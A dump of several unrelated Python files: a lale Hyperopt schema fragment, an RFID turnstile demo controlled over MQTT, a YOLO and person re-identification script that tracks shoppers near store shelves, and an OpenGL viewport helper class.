Used for cases where the scorer has a signature such as ``scorer(estimator, X, y, **kwargs)``.
""",
"default": None,
},
"verbose": {
"description": """Whether to print errors from each of the trials if any.
This is also logged using logger.warning.""",
"type": "boolean",
"default": False,
},
},
}
]
}
_input_fit_schema = {
"type": "object",
"required": ["X", "y"],
"properties": {"X": {}, "y": {}},
}
_input_predict_schema = {"type": "object", "required": ["X"], "properties": {"X": {}}}
_output_predict_schema: Dict[str, Any] = {}
_combined_schemas = {
"description": """Hyperopt_ is a popular open-source Bayesian optimizer.
.. _Hyperopt: https://github.com/hyperopt/hyperopt
Examples
--------
>>> from lale.lib.sklearn import LogisticRegression as LR
>>> clf = Hyperopt(estimator=LR, cv=3, max_evals=5)
>>> from sklearn import datasets
>>> diabetes = datasets.load_diabetes()
>>> X = diabetes.data[:150]
>>> y = diabetes.target[:150]
>>> trained = clf.fit(X, y)
>>> predictions = trained.predict(X)
Other scoring metrics:
>>> from sklearn.metrics import make_scorer, f1_score
>>> clf = Hyperopt(estimator=LR,
... scoring=make_scorer(f1_score, average='macro'), cv=3, max_evals=5)
""",
"documentation_url": "https://lale.readthedocs.io/en/latest/modules/lale.lib.lale.hyperopt.html",
"import_from": "lale.lib.lale",
"type": "object",
"tags": {"pre": [], "op": ["estimator"], "post": []},
"properties": {
"hyperparams": _hyperparams_schema,
"input_fit": _input_fit_schema,
"input_predict": _input_predict_schema,
"output_predict": _output_predict_schema,
},
}
Hyperopt = lale.operators.make_operator(_HyperoptImpl, _combined_schemas)
lale.docstrings.set_docstrings(Hyperopt)
|
turnstile_demo.py
|
#!/usr/bin/python
try:
import mosquitto
except ImportError:
import paho.mqtt.client as mosquitto
import logging
import time
import serial
import threading
import re
logging.getLogger('').setLevel(logging.DEBUG)
class WbMqttHandler(object):
def _on_mqtt_message(self, mosq, obj, msg):
logging.debug("got mqtt message on topic %s" % msg.topic)
if not mosquitto.topic_matches_sub('/devices/+/controls/#', msg.topic):
return
parts = msg.topic.split('/')
device_id = parts[2].decode('utf8')
control_id = parts[4].decode('utf8')
channel = (device_id, control_id)
# ignore retained values
if msg.retain:
return
logging.debug("%s/%s <= %s" % (channel[0], channel[1], msg.payload))
self.on_channel_value(self._format_channel(channel), msg.payload)
def _parse_channel(self, channel_str):
channel = channel_str.split('/', 1)
if len(channel) != 2:
raise RuntimeError("wrong channel spec %s" % channel_str)
return tuple(channel)
def _format_channel(self, channel):
assert len(channel) == 2
return "%s/%s" % channel
def on_channel_value(self, channel, value):
""" to be redefined in user classes """
logging.info("%s/%s <= %s" % (channel[0], channel[1], value))
def set_channel_value(self, channel_str, value):
channel = self._parse_channel(channel_str)
topic = "/devices/%s/controls/%s/on" % channel
self.client.publish(topic, str(value), qos=2, retain=False)
def __init__(self, subscribe_channels = []):
self.client = mosquitto.Mosquitto()
self.client.connect("127.0.0.1", 1883)
self.client.on_message = self._on_mqtt_message
self.client.loop_start()
for channel_str in subscribe_channels:
channel = self._parse_channel(channel_str)
self.client.subscribe("/devices/%s/controls/%s" % channel)
print "/devices/%s/controls/%s" % channel
class Matrix3NetworkHandler(object):
""" handles a network of Matrix III RD-ALL readers
connected to a single RS-485 bus.
    The readers must be prepared by flashing the special firmware first:
http://www.ironlogic.ru/il.nsf/file/ru_rdall_net.rar/$FILE/rdall_net.rar
"""
def __init__(self, port, timeout=1):
self.port = serial.Serial(port = port,
baudrate=9600, parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
timeout=timeout)
self.reader_thread = threading.Thread(target=self.reader_loop)
self.reader_thread.daemon = True
self.reader_thread.start()
self.card_pattern = re.compile(r'^([^[]+)\[([0-9A-F]+)\] ([^ ]*) ?(?:\(([^,]+),([^,]+)\))? ?(\d{3}),(\d{5})$')
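        # Assumed reading of the pattern above: group 1 = card type (e.g. 'Mifare'),
        # group 2 = hex serial, group 3 = optional subtype ('UL', '1K', 'DF'),
        # groups 4/5 = optional "(xxxx,yy)" type codes, groups 6/7 = decimal "NNN,NNNNN" pair.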
def parse_reply(self, line):
""" Processes the message sent by Matrix III reader in
        network mode. Returns None if the reply cannot be parsed,
        and a tuple of (reader_id, message) otherwise """
# format:
# UUUUU <everything else>
# UUUUU is a reader id
match = re.match("^(\d{5}) (.*)$", line)
if not match:
return None
reader_id = int(match.group(1))
message = match.group(2)
return reader_id, message
def parse_card_message(self, msg):
""" Parses the reader answer about the card in field, if any.
Returns None if no card present,
a tuple (card_type, card_number) otherwise
"""
# Examples of card messages:
# No Card
# Mifare[3AAC2280045646] (0142,20) 004,22086
# Mifare[3AAC228004724B] (0142,20) 004,29259
# Mifare[A24B3180044807] (0144,10) 004,18439
# Mifare[77242CF0] (0004,88) 044,09335
# Mifare[FA592F830412E6] UL (0144,00) 004,04838
# Mifare[F2D329830409B6] UL (0144,00) 004,02486
# Mifare[2A223182048F18] UL (0144,00) 004,36632
# Mifare[F274238004DEC2] UL (0144,00) 004,57026
# Mifare[81895266340051] UL (0144,00) 052,00081
# Mifare[BCD14264] 1K (0004,08) 066,53692
# Mifare[24548AAC] 1K (0004,08) 138,21540
# Mifare[9DCB4340] 1K (0004,08) 067,52125
# Mifare[124A2D80042C27] DF (0144,20) 004,11303
# Em-Marine[5500] 126,58404
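# How the regex groups of card_pattern map onto the samples above (field names are
# inferred from the examples, not from vendor documentation):
#   group 1    -> card type ("Mifare", "Em-Marine", ...)
#   group 2    -> hex serial printed inside the brackets
#   group 3    -> optional subtype ("UL", "1K", "DF" or empty)
#   groups 4,5 -> optional pair in parentheses, e.g. (0144,00)
#   groups 6,7 -> trailing decimal pair, e.g. 004,04838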
if msg == 'No Card':
return None
logging.debug("got card message: '%s'" % msg)
match = re.match(self.card_pattern, msg)
if not match:
logging.warning("unknown card message: %s" % msg)
return None
card_type = match.group(1)
card_subtype = match.group(3)
serial_1 = match.group(2)
serial_2 = match.group(6)
serial_3 = match.group(7)
serial_23_hex = hex(int(serial_2)*0xFF + int(serial_3))[2:].upper()
if card_type == 'Mifare':
# serial_2 and serial_3 duplicate the last bytes of serial_1, so they are ignored here
serial = serial_1
else:
serial = serial_1 + serial_23_hex
return (card_type + card_subtype, serial)
def process_async_message(self, msg):
""" Processes the message sent by Matrix III reader
for a new card detected in field """
# example reader message:
# 19997 Mifare[62D22F80041B4B] (0144,08) 004,06987
reply = self.parse_reply(msg)
if reply:
reader_id, card_message = reply
card_info = self.parse_card_message(card_message)
if card_info:
card_type, card_serial = card_info
logging.debug("Reader %s: new card %s[%s] in field" % (reader_id, card_serial, card_type))
self.on_new_card(reader_id, card_type, card_serial)
def reader_loop(self):
while True:
line = self.port.readline()
if line:
self.process_async_message(line[:-2])
def on_new_card(self, reader_id, card_type, card_serial):
""" to be ovverriden by user """
logging.info("Reader %s: new card %s[%s] in field" % (reader_id, card_serial, card_type))
class TurnstilesManager(object):
def on_pass_signal(self, channel, value):
if value != '1':
return
for turnstile in self.turnstiles:
if channel == turnstile['pass_status_channel']:
logging.info("Pass signal detected for turnstile %s" % turnstile['name'])
break
def on_new_card(self, reader_id, card_type, card_serial):
logging.info("Reader %s: new card %s[%s] in field" % (reader_id, card_serial, card_type))
for turnstile in self.turnstiles:
if reader_id == turnstile['reader_id']:
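# demo access rule: only cards with an even serial number open the gate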
allow_open = int(card_serial, 16) % 2 == 0
if allow_open:
logging.info("Turnstile %s: opening the gate" % turnstile['name'])
self.mqtt_handler.set_channel_value(turnstile['open_channel'], '1')
time.sleep(100E-3)
self.mqtt_handler.set_channel_value(turnstile['open_channel'], '0')
else:
logging.info("Turnstile %s: access denied!" % turnstile['name'])
break
else:
logging.error("unknown reader id: %s" % reader_id)
def __init__(self, turnstiles):
self.turnstiles = turnstiles
status_channels = [turnstile['pass_status_channel'] for turnstile in self.turnstiles]
self.mqtt_handler = WbMqttHandler(subscribe_channels = status_channels)
self.readers_handler = Matrix3NetworkHandler(port='/dev/ttyAPP4')
self.mqtt_handler.on_channel_value = self.on_pass_signal
self.readers_handler.on_new_card = self.on_new_card
if __name__ =='__main__':
manager = TurnstilesManager(turnstiles = [
{
'name' : 'Turnstile 1 forward',
'reader_id' : 3794,
'pass_status_channel' : 'wb-gpio/A1_IN',
'open_channel' : 'wb-gpio/EXT1_R3A1'
},
{
'name' : 'Turnstile 1 backwards',
'reader_id' : 12609,
'pass_status_channel' : 'wb-gpio/A2_IN',
'open_channel' : 'wb-gpio/EXT1_R3A2'
},
])
# mqtt_handler = WbMqttHandler(subscribe_channels = [ "wb-gpio/A1_IN", "wb-gpio/A2_IN" ])
# readers_handler = Matrix3NetworkHandler(port='/dev/ttyAPP4')
time.sleep(1E100)
|
main_multi_processing2_zc.py
|
#encoding: utf-8
from multiprocessing import Pool, Process
from multiprocessing.managers import BaseManager
import os, time, random
import HKIPcamera
import cv2
import copy
import math
from loadconfig import *
import rospy
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge, CvBridgeError
from utils import *
from darknet import Darknet
import os.path as osp
from reid.utils.serialization import load_checkpoint
from reid import models
from reid.feature_extraction import extract_cnn_feature
import time
import publish_msg.publish_msg as pubmsg
import pickle
import torchvision.transforms as T
import torch
import numpy as np
class HKCamera(object):
def __init__(self, ip, name, pw):
self._ip = ip
self._name = name
self._pw = pw
HKIPcamera.init(self._ip, self._name, self._pw)
def getFrame(self):
frame = HKIPcamera.getframe()
return frame
def compare_dic(dic1, dic2):
for i in (dic1):
for j in (dic2):
if i == j and dic1[i] != dic2[j]:
return True
return False
def exist_people(dic1):
for i in (dic1):
if dic1[i] == 1:
return True
return False
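# diff_dic returns the keys of dic1 whose value differs in dic2, plus any key of dic1
# that is missing from dic2 (a missing key is appended once per key of dic2, so the
# result may contain duplicates)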
def diff_dic(dic2, dic1):
diff = []
for i in (dic1):
for j in (dic2):
if i == j and dic1[i] != dic2[j]:
diff.append(i)
if i not in dic2:
diff.append(i)
return diff
def pairwise_distance(fea1, fea2):
fea1 = torch.squeeze(fea1, 0)
fea1 = torch.squeeze(fea1, -1)
fea2 = torch.squeeze(fea2, 0)
fea2 = torch.squeeze(fea2, -1)
x = fea1
y = fea2
m1, n = 1, 1
x = x.view(m1, -1)
y = y.view(n, -1)
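# squared Euclidean distance via the expansion ||x - y||^2 = ||x||^2 + ||y||^2 - 2*x.y^T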
dist = torch.pow(x, 2).sum(1).unsqueeze(1).expand(m1, n) + \
torch.pow(y, 2).sum(1).unsqueeze(1).expand(n, m1).t()
dist.addmm_(1, -2, x, y.t())
return torch.sum(dist)
def jieduan(img, left, top, right, bottom):
imgg = np.zeros((bottom - top, right - left, 3))
imgg = img[top:bottom, left:right, :]
return imgg
def calcIOU(p_x, p_y, p_bx, p_by, c_x, c_y, c_bx, c_by):
zh = c_x
c_x = c_bx # 960 - c_x
c_bx = zh # 960 - c_bx
condition1 = p_x >= c_x and p_x <= c_bx
condition2 = p_bx >= c_x and p_bx <= c_bx
condition3 = p_y >= c_y and p_y <= c_by
condition4 = p_by >= c_y and p_by <= c_by
# print p_x, p_y, p_bx, p_by, c_x, c_y, c_bx, c_by
if (condition1 and condition3) or (condition1 and condition4) or \
(condition2 and condition3) or (condition2 and condition4):
calcIOU = 1
else:
calcIOU = -1
return calcIOU
def newcalcIOU(two_x, two_y, two_w, two_h, one_x, one_y, one_w, one_h):
zh = one_x
one_x = one_w # 960-one_x
one_w = zh # 960-one_w
S_rec1 = (one_w - one_x) * (one_h - one_y)
S_rec2 = (two_w - two_x) * (two_h - two_y)
sum_area = S_rec1 + S_rec2
left_line = max(one_x, two_x)
right_line = min(one_w, two_w)
top_line = max(one_y, two_y)
bottom_line = min(one_h, two_h)
# judge if there is an intersect
if left_line >= right_line or top_line >= bottom_line:
return -1
else:
intersect = (right_line - left_line) * (bottom_line - top_line)
# print intersect, S_rec2
iou = float(intersect) / S_rec2
return iou
def coordinate_IOU(two_x, two_y, two_w, two_h, one_x, one_y, one_w, one_h): # compute the coordinate of the IOU area
zh = one_x
one_x = one_w # 960-one_x
one_w = zh # 960-one_w
left_line = max(one_x, two_x)
right_line = min(one_w, two_w)
top_line = max(one_y, two_y)
bottom_line = min(one_h, two_h)
return left_line, top_line, right_line, bottom_line
def distanceCal(p_y, s_y):
# return math.sqrt(pow(abs(p_x - s_x), 2) + pow(abs(p_y - s_y), 2))
return abs(p_y - s_y)
# person detection and reid
def preprocess(img):
img = cv2.resize(img, (128, 256))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # img[:,:,::-1]
img = test_transformer(img)
img = torch.unsqueeze(img, 0)
return img
global save_box_no
save_box_no = 0
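# reid_draw crops the detected person box from the frame, extracts a ReID feature with the
# CNN and matches it against the pickled gallery by smallest pairwise distance (or, when
# change_idnum is set, matches against the previous frame's boxes by position), then draws
# the box and the matched id on the frame.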
def reid_draw(frame, b_b, model, cfg, huojia1_id, pre_res,change_idnum):
global size
global save_box_no
id_name = 0
cfg.cuda()
left = int((b_b[0] - b_b[2] / 2.0) * size[0])
top = int((b_b[1] - b_b[3] / 2.0) * size[1])
right = int((b_b[0] + b_b[2] / 2.0) * size[0])
bottom = int((b_b[1] + b_b[3] / 2.0) * size[1])
if left < 0 or right < 0 or top < 0 or bottom < 0:
return left, top, right, bottom, 999
# if bottom > 530:
# ratio = float(bottom - top) / (right - left)
# #print("ratio is: {}".format(ratio))
# if ratio < 1.5:
# #print("ratio is: {}".format(ratio))
# print('filtered out')
# return left, top, right, bottom, 999
frame_reid = copy.deepcopy(frame)
# draw shangpin area
left_x, top_y, right_m, bottom_n = shangpin_area(huojia1_id)
cv2.rectangle(frame, (left_x, top_y), (right_m, bottom_n), (0, 255, 0), 2)
ratio = float(bottom - top) / (right - left)
# # print(ratio)
# if ratio < 2.0:
# # print('filtered out')
# return left, top, right, bottom, 999
img1 = jieduan(frame_reid, left, top, right, bottom)
img = preprocess(img1)
feature = extract_cnn_feature(model, img.cuda())
minsim = -1
try:
pkl_file = open('/data/reid/renti/data.pkl', 'rb')
shujuku = pickle.load(pkl_file)
pkl_file.close()
except:
pkl_file = open('/data/reid/renti/data_bu.pkl', 'rb')
shujuku = pickle.load(pkl_file)
pkl_file.close()
rentidir = '/home/tujh/renti/'
# pkl_file = open('/data/reid/renti/data.pkl', 'rb')
# shujuku = pickle.load(pkl_file)
# pre_item_huoid={}
# for id_name, pre_item in pre_res.items():
# if huojia1_id == pre_item[-1]:
# pre_item_huoid[id_name]=pre_item ##person id in front of huojia_id
if change_idnum:#len(pre_res) == len(shujuku) and #pre_item_huoid:
id_name = reid_draw_multi(pre_res, b_b)
pre_fix='B:'
else:
# for feature2,filename in shujuku:
for query in shujuku:
for fea in shujuku[query]:
distan = pairwise_distance(feature, fea)
if minsim > distan or minsim == -1:
minsim = distan
id_name = int(query)
pre_fix = 'R:'
cv2.rectangle(frame, (left, top), (right, bottom), (255, 0, 0), 2)
cv2.putText(frame, pre_fix+str(id_name), (left, top), cv2.FONT_HERSHEY_COMPLEX, 6, (255, 0, 0), 2)
cv2.imwrite('/home/zhaocy/yhr/tmp_imgs/' + str(save_box_no) + '_' + str(id_name) + '.jpg', img1)
save_box_no += 1
return left, top, right, bottom, id_name
def reid_draw_multi(pre_res, result):
dic_res = {}
if len(pre_res) != 0:
pre_item_center = [abs(result[0] - pre_item[0]) for id_name, pre_item in pre_res.items()]
dist_res = min(pre_item_center)
index_min_dist = pre_item_center.index(dist_res)
id_name_res = list(pre_res.keys())
id_name = id_name_res[index_min_dist]
left, top, right, bottom,_ = pre_res[id_name]
# dic_res[id_name] = [left, top, right, bottom]
return id_name
normalizer = T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
test_transformer = T.Compose([T.ToTensor(),
normalizer,
])
# the area of shangpin
# shelf1,2,3,5,6,7
def shangpin_area(shelfid):
if shelfid == 1:
left_x, top_y, right_m, bottom_n = 741, 18, 596, 253
elif shelfid == 10:
left_x, top_y, right_m, bottom_n = 568, 9, 389, 252
elif shelfid == 4:
left_x, top_y, right_m, bottom_n = 870, 10, 190, 370
elif shelfid == 2:
left_x, top_y, right_m, bottom_n = 680, 27, 169, 332
elif shelfid == 6:
left_x, top_y, right_m, bottom_n = 353, 39, 200, 273
elif shelfid == 7:
left_x, top_y, right_m, bottom_n = 712, 3, 310, 344
else:
left_x, top_y, right_m, bottom_n = 0, 0, 0, 0
return left_x, top_y, right_m, bottom_n
# initialize the flag of all the people we detected
def initial_flag(left, top, right, bottom, shelfid):
left_x, top_y, right_m, bottom_n = shangpin_area(shelfid)
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
#print("Shelf {}: Filter in IOU = {:4f}".format(shelfid, calcIOU1))
distance = distanceCal(bottom_n, bottom)
#print("shelf {}: distance = {}".format(shelfid, distance))
if calcIOU1 > 0.5 and distance < 100:
flag = 1
else:
flag = 0
return flag
def initial_flag_out(left, top, right, bottom, shelfid):
left_x, top_y, right_m, bottom_n = shangpin_area(shelfid)
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
#print("Shelf {}: Filter out IOU = {}".format(shelfid, calcIOU1))
distance = distanceCal(bottom_n, bottom)
#print("shelf {}: distance = {}".format(shelfid, distance))
#if calcIOU1 > 0.2 or distance < 130:
if calcIOU1 > 0.1:# and distance < 130:
flag = 1
else:
flag = 0
return flag
def xuanze_original(res, frame, model, cfg, camera_id, dic_change, huojia1_id,pre_res):
dic = {}
change_idnum = len(res) == len(pre_res.keys())
if len(res) == 1:
result = res[0]
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg, huojia1_id,pre_res,change_idnum)
if id_name == 999:
pass
else:
if id_name in dic_change:
if dic_change[id_name] == 1:
flag = initial_flag_out(left, top, right, bottom, huojia1_id)
else:
flag = initial_flag(left, top, right, bottom, huojia1_id)
else:
flag = initial_flag(left, top, right, bottom, huojia1_id)
dic[id_name] = flag
elif len(res) > 1:
for item in res:
result = item
if (len(result) > 0):
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg, huojia1_id,pre_res,change_idnum)
if id_name == 999:
pass
else:
if id_name in dic_change:
if dic_change[id_name] == 1:
flag = initial_flag_out(left, top, right, bottom, huojia1_id)
else:
flag = initial_flag(left, top, right, bottom, huojia1_id)
else:
flag = initial_flag(left, top, right, bottom, huojia1_id)
dic[id_name] = flag
return dic
def people_list(res, shelfid):
peolist = []
left_x, top_y, right_m, bottom_n = shangpin_area(shelfid)
for b_b in res:
global size
left = int((b_b[0] - b_b[2] / 2.0) * size[0])
top = int((b_b[1] - b_b[3] / 2.0) * size[1])
right = int((b_b[0] + b_b[2] / 2.0) * size[0])
bottom = int((b_b[1] + b_b[3] / 2.0) * size[1])
if calcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n) > 0:
x1, x2, x3, x4 = coordinate_IOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
peolist.append(x1)
peolist.append(x2)
peolist.append(x3)
peolist.append(x4)
return peolist
global in_out_moments_count
in_out_moments_count = 0
# choose the one which is next to the area of shangpin
def xuanze(res, frame, model, cfg, threadPubMsg_dict, camera_id, dic, change_dic,
huojia1_id, frame_trans,pre_res):
global in_out_moments_count
change_idnum=len(res)==len(pre_res.keys())
for item in res:
result = item
# add new person
if (len(result) > 0):
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg, huojia1_id,pre_res,change_idnum)
if id_name == 999:
pass
else:
in_out_people = diff_dic(dic, change_dic)
if id_name in in_out_people:
left_x, top_y, right_m, bottom_n = shangpin_area(huojia1_id)
customer_name = "name" + str(id_name)
assert type(id_name) is int # must be number
# print("set customer message")
threadPubMsg = threadPubMsg_dict['shelfID_' + str(huojia1_id)]
if change_dic[id_name] == 1:
time.sleep(1) # time delay x seconds
flag = 1
flag1 = 0
flag2 = 1
print(
"t = {}, flag = {}, flag1 = {}, flag2 = {}, id_name = {}, shelfID = {}".format(time.time(),
flag, flag1,
flag2,
id_name,
huojia1_id))
threadPubMsg.set_commodity_recognition_trigger_with_image(camera_id=camera_id,
person_id=id_name,
shelf_id=huojia1_id, flag=flag,
flag1=flag1,
flag2=flag2,
flag_list=people_list(res, huojia1_id),
frame=frame_trans)
cv2.imwrite('/home/shiw/yhr/in_out_moments/' + str(in_out_moments_count) + '.jpg', frame)
in_out_moments_count += 1
print("huojia1: {}".format(huojia1_id))
else:
flag = 0
flag1 = 1
flag2 = 0
print(
"t = {}, flag = {}, flag1 = {}, flag2 = {}, id_name = {}, shelfID = {}".format(time.time(),
flag, flag1,
flag2,
id_name,
huojia1_id))
threadPubMsg.set_commodity_recognition_trigger_with_image(camera_id=camera_id,
person_id=id_name,
shelf_id=huojia1_id, flag=flag,
flag1=flag1,
flag2=flag2,
flag_list=people_list(res, huojia1_id),
frame=None)
cv2.imwrite('/home/shiw/yhr/in_out_moments/' + str(in_out_moments_count) + '.jpg', frame)
in_out_moments_count += 1
print("huojia1: {}".format(huojia1_id))
threadPubMsg.set_customer(name=customer_name, person_id=id_name, camera_id=camera_id, x=left, y=top,
w=right, h=bottom)
return dic
def loadDataset():
torch.cuda.set_device(0)
logs_dir = 'market-1501-Exper33/RPP/'
num_features = 256
num_classes = 751
T = 1
dim = 256
dropout = 0.5
model = models.create('resnet50_rpp', num_features=num_features, dropout=dropout, num_classes=num_classes,
cut_at_pooling=False, FCN=True, T=T, dim=dim)
model = model.cuda()
checkpoint = load_checkpoint(osp.join(logs_dir, 'cvs_checkpoint_0107.pth.tar'))
model.load_state_dict(checkpoint['state_dict'])
res = []
frame_number = 0
# --datasets
shujuku = {}
rentidir = '/data/reid/renti/queries'
return model
def callback(param_tuple): # param_tuple
cfg = param_tuple[1]
model = param_tuple[2]
dict_res = {}
frame_number_list = param_tuple[3]
bridge = param_tuple[4]
camera_id = param_tuple[5]
flag = param_tuple[6]
frame = param_tuple[7]
huojia1_id = param_tuple[8]
pre_res = param_tuple[9]
shape = frame.shape
global size
size = (shape[1], shape[0])
# global frame_number
frame_number_list[0] = frame_number_list[0] + 1
frame_number = frame_number_list[0]
wh_ratio = frame.shape[1] / frame.shape[0]
if type(frame) != np.ndarray:
return True
# detect per 8 frame
# if frame_number % 8 == 1 or frame_number % 8 == 2 or frame_number % 8 == 3 or frame_number % 8 == 4 or frame_number % 8 == 5 or frame_number % 8 == 6 or frame_number % 8 == 7:
# return True
cfg.cuda()
use_cuda = 1
sized = cv2.resize(frame, (cfg.width, cfg.height))
sized = cv2.cvtColor(sized, cv2.COLOR_BGR2RGB)
r = do_detect(cfg, sized, 0.5, 0.4, use_cuda)
num_classes = 80
if num_classes == 20:
namesfile = 'data/voc.names'
elif num_classes == 80:
namesfile = 'data/coco.names'
else:
namesfile = 'data/names'
class_names = load_class_names(namesfile)
res = []
for item in r:
if class_names[item[6]] == 'person':
res.append(item)
# get the max rectangle
result = []
change_idnum=len(pre_res.keys())==len(res)
for item in res:
result = item
if (len(result) > 0):
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg, huojia1_id, pre_res,change_idnum)
if id_name != 999:
dict_res[id_name] = [left, top, right, bottom, huojia1_id]
cv2.imshow('Cam2', cv2.resize(frame, (int(512 * wh_ratio), 512)))
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
return res, camera_id, dict_res
def main(camera_id, shelf_id):
rospy.init_node('MultiProcessingNode', anonymous=True)
ip = '192.168.0.' + str(camera_id)
name = str('admin')
pw = str('a1234567')
camera = HKCamera(ip, name, pw)
threadPubMsg_shelfID_1 = pubmsg.MsgPublishClass(cameraID=camera_id, shelfID=shelf_id[0])
threadPubMsg_shelfID_1.setDaemon(True)
threadPubMsg_shelfID_1.start()
shelf1 = 'shelfID_' + str(shelf_id[0])
threadPubMsg_dict = {shelf1: threadPubMsg_shelfID_1}
model = loadDataset()
cfg = Darknet('cfg/yolov3.cfg')
cfg.load_weights('yolov3.weights')
cfg.cuda()
# global frame_number
frame_number2 = [0]
flag = [0]
bridge = CvBridge()
dic_change = {}
pre_res = {}
huojia1_id = shelf_id[0]
print("huojia1_id: {}".format(huojia1_id))
tmp = 0
while not rospy.is_shutdown():
frame_origin = camera.getFrame()
frame_origin = np.array(frame_origin)
frame_origin = cv2.resize(frame_origin, None, fx=0.75, fy=0.75, interpolation=cv2.INTER_AREA)
frame_trans = copy.deepcopy(frame_origin)
# draw the shangpin area
# left_x, top_y, right_m, bottom_n = shangpin_area(huojia1_id)
# cv2.rectangle(frame_origin, (left_x, top_y), (right_m, bottom_n), (0, 255, 0), 2)
res, camera_id, dict_res = callback((None, cfg, model, frame_number2, bridge, camera_id, flag, frame_origin, huojia1_id, pre_res))
if res == []:
if tmp > 30:
threadPubMsg = threadPubMsg_dict['shelfID_' + str(huojia1_id)]
threadPubMsg.set_commodity_recognition_trigger_with_image(camera_id=camera_id, person_id=-1,
shelf_id=huojia1_id, flag=0, flag1=0, flag2=0,
flag_list=[], frame=None)
tmp = 0
else:
tmp += 1
continue
else:
tmp = 0
dic = xuanze_original(res, frame_origin, model, cfg, camera_id, dic_change, huojia1_id,pre_res)
if compare_dic(dic, dic_change) == False:
pass
else:
dic = xuanze(res, frame_origin, model, cfg, threadPubMsg_dict, camera_id, dic, dic_change,
huojia1_id, frame_trans,pre_res)
#print("**********************")
#print("dic_change_shelf_{}: {}".format(shelf_id[0], dic))
#print("")
change_idnum = len(pre_res.keys()) == len(res)
if change_idnum:
pre_res = dict_res
else:
pre_res = {}
dic_change = dic
HKIPcamera.release()
if __name__ == '__main__':
#rospy.init_node('MultiProcessingNode', anonymous=True)
# manager = MyManager()
# manager.start()
#main(2, [1, 2])
# Start multiple processes, one process per camera
camera_ids = [3]
# shelf_ids = {3: [4], 5: [2]}
shelf_ids = {3: [4]}
# camera_ids = [6]
# shelf_ids = {6: [7]}
proces = []
for camera_id in camera_ids:
p = Process(target=main, args=(camera_id, shelf_ids[camera_id]))
proces.append(p)
p.start()
for p in proces:
p.join()
print("rospy.spin()")
rospy.spin()
|
glprogram.py
|
"""This module defines convenient classes for building 3D GUI programs.
- GLProgram takes care of basic user input.
- GLNavigationProgram allows 3D navigation with the mouse.
- GLRealtimeProgram calls a subclass-defined idle() function roughly on a
constant time step.
"""
from OpenGL.GL import *
from OpenGL.GLU import *
import camera
from ..math import so3,se3,vectorops
from ..robotsim import Viewport
import math
import time
class GLViewport:
"""
A class describing an OpenGL camera view.
Attributes:
x,y (int): upper left hand corner of the view in the OpenGL canvas, in screen pixels
w,h (int): width and height of the view, in screen pixels
screenDeviceScale (float): if not 1, multiply screen pixel coordinates by this to get
openGL pixel coordinates (usually Mac Retina displays)
orthogonal (bool): if true, does an orthogonal projection. (Not supported)
camera: an orbit camera (see :class:`orbit`)
fov (float): the camera field of view in x direction, in degrees
clippingplanes (pair of floats): a pair containing the near and far clipping planes
"""
def __init__(self):
self.orthogonal = False
self.x,self.y = 0,0
self.w,self.h = 640,480
self.screenDeviceScale = 1
self.camera = camera.orbit()
self.camera.dist = 6.0
#x field of view in degrees
self.fov = 30
#near and far clipping planes
self.clippingplanes = (0.2,20)
def contains(self,x,y):
return x >= self.x and y >= self.y and x < self.x + self.w and y < self.y + self.h
def setTransform(self,T,convention='standard'):
"""Sets the pose of the camera, with T given in world coordinates.
If convention = 'openGL', the Z axis of T is the *backward* direction of
the camera, with X pointing *up* and Y pointing to the *right*.
If convention = 'standard', the Z axis of T is the *forward* direction of
the camera, with X pointing *down* and Y pointing to the *right*
"""
if convention == 'openGL':
self.camera.set_matrix(T)
else:
xzflip = [-1,0,0, 0,1,0, 0,0,-1]
self.camera.set_matrix((so3.mul(T[0],xzflip),T[1]))
def getTransform(self,convention='standard'):
"""Gets the pose of the camera, with T given in world coordinates.
If convention = 'openGL', the Z axis of T is the *backward* direction of
the camera, with X pointing *up* and Y pointing to the *right*.
If convention = 'standard', the Z axis of T is the *forward* direction of
the camera, with X pointing *down* and Y pointing to the *right*
"""
if convention == 'openGL':
return self.camera.matrix()
else:
T = self.camera.matrix()
xzflip = [-1,0,0, 0,1,0, 0,0,-1]
return (so3.mul(T[0],xzflip),T[1])
def fit(self,center,radius):
"""Fits the viewport to an object filling a sphere of a certain center
and radius"""
self.camera.tgt = center
self.camera.dist = radius*2
zmin,zmax = self.clippingplanes
if radius < self.clippingplanes[0]:
zmin = radius*0.5
if radius*3 > self.clippingplanes[1]:
zmax = radius*3.5
self.clippingplanes = (zmin,zmax)
def toViewport(self):
"""Returns a Klampt C++ Viewport() instance corresponding to this view.
This is used to interface with the Widget classes"""
vp = Viewport()
vp.x,vp.y,vp.w,vp.h = self.x,self.y,self.w,self.h
vp.n,vp.f = self.clippingplanes
vp.perspective = True
aspect = float(self.w)/float(self.h)
rfov = self.fov*math.pi/180.0
vp.scale = 1.0/(2.0*math.tan(rfov*0.5/aspect)*aspect)
vp.setRigidTransform(*self.camera.matrix())
return vp
def click_ray(self,x,y):
"""Returns a pair of 3-tuples indicating the ray source and direction
in world coordinates for a screen-coordinate point (x,y)"""
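# (x,y) is mapped to normalized image-plane coordinates (u,v) centered on the viewport,
# scaled according to the field of view into a camera-frame direction, and finally
# rotated into world coordinates.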
R,t = self.camera.matrix()
#from x and y compute ray direction
u = float(x-(self.x + self.w/2))/self.w
v = float((self.y + self.h/2) -y)/self.w
aspect = float(self.w)/float(self.h)
rfov = self.fov*math.pi/180.0
scale = 2.0*math.tan(rfov*0.5/aspect)*aspect
d = (u*scale,v*scale,-1.0)
d = vectorops.div(d,vectorops.norm(d))
return (t,so3.apply(R,d))
def project(self,pt,clip=True):
"""Given a point in world space, returns the (x,y,z) coordinates of the projected
pixel. z is given in absolute coordinates, while x,y are given in pixel values.
If clip=True and the point is out of the viewing volume, then None is returned.
Otherwise, if the point is exactly at the focal plane then the middle of the viewport
is returned.
"""
